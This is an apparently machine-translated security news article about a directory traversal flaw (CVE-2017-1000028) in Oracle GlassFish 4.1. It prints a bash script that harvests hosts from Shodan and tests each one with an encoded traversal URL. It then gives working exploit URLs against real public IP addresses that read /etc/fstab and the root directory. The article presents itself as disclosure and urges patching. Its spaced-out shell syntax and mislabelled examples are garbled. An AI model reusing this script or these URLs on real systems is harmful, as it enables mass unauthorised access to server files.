Friday, January 22, 18:52
Home investigations GlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle Vulnerability: Security researcher Dimitris Roussis analyzes us as a vulnerability to the known Application Server Its GlassFish Oracle recognized as CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) currently exposes data to thousands of servers worldwide.

Oracle GlassFish

Its exploitation security vacuum allows to read through the Directory Traversal Attack type of all server files on which the Application Server is installed.

In the analysis carried out by the researcher, 300 servers are first used as a sample through the shodan search engine that has GlashFish installed on the 4.1 version.

Then, through an automated script created by the researcher, they check which of the servers actually exists. vulnerability.

#! / bin / bash # Get 300 Results From Shodan search engine shodan search --limit 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Sort IP cat servers_ip.txt | sort -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Remove All Whitespace sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Delete Temporary Files rm servers_ip.txt rm servers_sort.txt # Server List input = "servers.txt" # check Server for the vulnerability while IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Connection Successful! Server is vulnerable" #Save result in vulnerable_servers.txt echo "$ url" >> vulnerable_servers.txt else echo "- Connection Failed! Server is Not vulnerable" fi done < "$ input"

Servers

The end result of the script is to create a file that contains links (urls) to exploit the vulnerability immediately.

Looking at the links included in the file browser we can see all the files in the / root of the Server.

Examples include:

Windows Server & Hosting

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle Servers

We can now access any file we want on the Server by adding the file path to the end of the url.

B.C.

/ Etc/ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/ Root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

The above study demonstrates on the one hand that a vulnerability can lead to the disclosure of data on a large scale worldwide and on the other hand the need for immediate implementation of software updates by the System Administrators.

The SecNews editorial team sincerely thanks researcher Dimitrios Roussis for valid and timely information.

 

 

 

 

* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

LEAVE ANSWER

Please enter your comment!
Please enter your name here

LIVE NEWS

The DeLorean can return as an electric car

The DMC DeLorean has been out of production for almost 40 years, but it looks like the iconic vehicle will return as an electric car.

Windows RDP servers are used to support DDoS

Cybercrime gangs are abusing Windows Remote Desktop Protocol (RDP) systems to reinforce the unwanted ...

SEPA: He refused to pay a ransom and thousands of files were leaked

Thousands of stolen files of the Scottish Environmental Protection Agency (SEPA) have been published by hackers, after the organization refused to pay the ransom ...

Fines at Valve, Capcom and Zenimax for geo-exclusion of games

Following a European Commission investigation, a group of video game publishers was fined € 7,8 million following allegations of geo-exclusion practices. In...

Bitcoin helps the middle class survive the pandemic

Regulators still imply that Bitcoin is just a tool for criminals, but it seems that for the middle class ...

Lightworks 2021.1 for Linux, Mac and Windows has been released

Lightworks Professional Multi-Platform Video Editing Software received the first major update to Lightworks 2021.1 for Windows, Linux and Mac.

Netflix: Watch the 9 best Anime movies of all time

One of the good things about the pandemic was that many people were introduced to the anime world. And the issue with anime is ...

CHwapi: Windows BitLocker "hit" the Belgian hospital!

The CHwapi hospital in Belgium was attacked by a cyber attack on January 17, with hackers claiming to have encrypted 40 servers and 100 ...

CPU / GPU Lotteries: Newegg sells the few on the market

Hardware shortages are not uncommon, but the pandemic has worsened the situation. The whole planet is closed to ...

United Kingdom: Malware infects laptops delivered to students

In the context of e-learning implemented in many countries since the outbreak of the COVID-19 pandemic, governments are distributing the necessary equipment ...